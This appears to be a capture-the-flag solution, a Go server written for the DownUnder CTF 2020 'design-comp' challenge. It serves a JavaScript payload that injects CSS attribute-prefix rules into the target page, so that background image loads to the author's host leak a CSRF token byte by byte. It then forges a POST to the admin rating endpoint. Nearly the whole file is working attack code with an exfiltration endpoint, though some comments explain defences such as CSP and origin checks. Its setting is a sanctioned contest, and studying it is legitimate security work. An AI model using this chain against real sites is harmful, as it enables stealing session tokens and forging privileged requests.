My solution for the design-comp challenge in DownUnder CTF 2020
package main
import (
	"crypto/tls"
	"log"
	"net/http"
	"time"

	"github.com/gorilla/websocket"
	"golang.org/x/crypto/acme/autocert"
)
// csrf carries values received by stealCsrf to the goroutine running wsEndpoint.
// It is created in main with a buffer of one, so a send blocks as soon as one
// value is already waiting and nobody is reading on the WebSocket side.
var csrf chan string
// upgrader performs the WebSocket handshake for /ws.
//
// CheckOrigin always returns true, so the handshake is accepted whatever Origin
// header the browser sends. For a throwaway relay that is acceptable; in a
// service that carries real sessions it is the classic cross-site WebSocket
// hijacking setup, and Origin should be compared against an allow-list (the
// Upgrader's default when CheckOrigin is nil already requires the Origin host
// to match the request Host).
var upgrader = websocket.Upgrader{
	ReadBufferSize:  1024,
	WriteBufferSize: 1024,
	CheckOrigin:     func(r *http.Request) bool { return true },
}
// payload is the HTML page served by hack. Its script opens the challenge
// playground in a child window, waits 200 ms, then connects to
// wss://demo.nsa.group/ws and reacts to every message relayed by wsEndpoint:
//   - a message shorter than 24 characters is treated as a token prefix; the
//     script builds a stylesheet with one input[value^=...] rule per possible
//     next byte (two hex digits, 256 rules), each pointing a background URL at
//     /csrf?c=<prefix+candidate>, and posts it to the child window as a
//     'preview' action;
//   - anything longer is treated as the complete token and is submitted in a
//     POST form to /admin/rate together with the playground's user id and a
//     score of 10.
//
// The intent is that only the rule whose prefix matches the rendered token
// triggers its background fetch, so stealCsrf learns one more byte per round
// and feeds it back through the channel. Seen from the defending side, the
// chain needs two properties of the target page — the token is rendered in an
// input's value attribute, and user-supplied CSS is applied to that page —
// and removing either one (or a CSP that disallows the outbound image loads)
// breaks it.
const payload = `
<html><body><script>
const childwin = window.open('https://chal.duc.tf:30105/playground/fcd3c750-067c-4fa6-97ae-d398e4ff4ef6', 'haha', 'height=300px, width=500px');
setTimeout(function() {
const socket = new WebSocket('wss://demo.nsa.group/ws');
socket.addEventListener('message', async function (event) {
const csrf = event.data;
console.log(csrf);
if (csrf.length < 24) {
var msg = "#rater {display: block !important;}";
for (var i = 0; i < 256; i++) {
var ncsrf;
if (i < 16) {
ncsrf = csrf + "0" + i.toString(16);
} else {
ncsrf = csrf + i.toString(16);
}
msg += "\ninput[value^='" + ncsrf + "'] ~ * ~ * ~ * {background: url(https://demo.nsa.group/csrf?c=" + ncsrf + ") !important;}";
}
childwin.postMessage({action:'preview', css: msg}, '*');
} else {
const form = document.createElement('form');
form.method = 'POST';
form.action = 'https://chal.duc.tf:30105/admin/rate';
const csrfField = document.createElement('input');
csrfField.type = 'hidden';
csrfField.name = 'csrf';
csrfField.value = csrf;
form.appendChild(csrfField);
const userField = document.createElement('input');
userField.type = 'hidden';
userField.name = 'user';
userField.value = 'fcd3c750-067c-4fa6-97ae-d398e4ff4ef6';
form.appendChild(userField);
const scoreField = document.createElement('input');
scoreField.type = 'hidden';
scoreField.name = 'score';
scoreField.value = '10';
form.appendChild(scoreField);
document.body.appendChild(form);
form.submit();
}
});
}, 200);
</script></body></html>
`
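// wsEndpoint upgrades the request to a WebSocket and then relays every value
// that arrives on csrf to the client as a text message, starting with an empty
// string so the client has something to react to right away.
//
// Only one connection is served usefully at a time: each value read from csrf
// goes to whichever goroutine happens to receive it, so a second live client
// would silently split the stream.
func wsEndpoint(w http.ResponseWriter, r *http.Request) {
	ws, err := upgrader.Upgrade(w, r, nil)
	if err != nil {
		log.Println(err)
		return
	}
	// The upgrade hijacks the connection; it is ours to close.
	defer ws.Close()
	log.Println("Client Connected")

	// Discard a value left over from an earlier connection so the new client
	// starts from the empty prefix rather than a stale one.
	select {
	case <-csrf:
	default:
	}

	c := ""
	for {
		// %q: c originates from an untrusted query parameter (see stealCsrf).
		log.Printf("Sending %q", c)
		// 1 is websocket.TextMessage. A failed write means the peer is gone;
		// returning (instead of looping on) frees the goroutine and stops it
		// from consuming values meant for the next connection.
		if err = ws.WriteMessage(1, []byte(c)); err != nil {
			log.Println(err)
			return
		}
		c = <-csrf
	}
}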
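// stealCsrf is the collection endpoint: it takes the value of the c query
// parameter and hands it to wsEndpoint through csrf.
//
// The send blocks while the channel's single slot is full. Selecting on the
// request context as well lets a client that abandons the request free the
// handler instead of leaving it parked on the channel indefinitely.
func stealCsrf(w http.ResponseWriter, r *http.Request) {
	// r.URL.Query() parses the query on its own; the former ParseForm call
	// populated r.Form, which nothing read, and its error was ignored.
	c := r.URL.Query().Get("c")
	// c is untrusted input copied straight from the URL; %q keeps newlines and
	// control characters from forging extra log lines.
	log.Printf("Received %q", c)
	select {
	case csrf <- c:
	case <-r.Context().Done():
		log.Printf("client went away before %q could be queued", c)
	}
}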
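// hack serves payload as an HTML document. It is registered on "/" in main,
// so it answers every path not claimed by a more specific handler.
func hack(w http.ResponseWriter, r *http.Request) {
	// Set rather than Add: there is exactly one Content-Type for this response.
	w.Header().Set("Content-Type", "text/html")
	if _, err := w.Write([]byte(payload)); err != nil {
		log.Println(err)
	}
}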
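// main wires the three handlers, obtains a certificate for demo.nsa.group via
// ACME, and serves HTTPS on :https while a plain-HTTP listener on :http answers
// the ACME challenge and redirects other GET/HEAD requests to HTTPS.
func main() {
	// Buffer of one: stealCsrf can park a single value while wsEndpoint is
	// between reads; a further sender blocks until it is consumed.
	csrf = make(chan string, 1)

	// A private mux instead of http.DefaultServeMux, so nothing another package
	// registers on the default mux is exposed by accident.
	mux := http.NewServeMux()
	mux.HandleFunc("/", hack)
	mux.HandleFunc("/ws", wsEndpoint)
	mux.HandleFunc("/csrf", stealCsrf)

	// DirCache("./") keeps the ACME account key and certificate private keys in
	// the working directory; run from a directory that is neither served nor
	// shared with other users.
	certManager := autocert.Manager{
		Prompt:     autocert.AcceptTOS,
		HostPolicy: autocert.HostWhitelist("demo.nsa.group"),
		Cache:      autocert.DirCache("./"),
	}
	server := &http.Server{
		Addr:    ":https",
		Handler: mux,
		TLSConfig: &tls.Config{
			GetCertificate: certManager.GetCertificate,
		},
		// Bound the time a client may spend sending request headers; without
		// it a slow client can pin a connection indefinitely. ReadTimeout and
		// WriteTimeout are deliberately left unset so they cannot interfere
		// with the long-lived hijacked WebSocket connection on /ws.
		ReadHeaderTimeout: 10 * time.Second,
	}
	go func() {
		h := certManager.HTTPHandler(nil)
		httpSrv := &http.Server{
			Addr:              ":http",
			Handler:           h,
			ReadHeaderTimeout: 10 * time.Second,
		}
		log.Fatal(httpSrv.ListenAndServe())
	}()
	log.Fatal(server.ListenAndServeTLS("", ""))
}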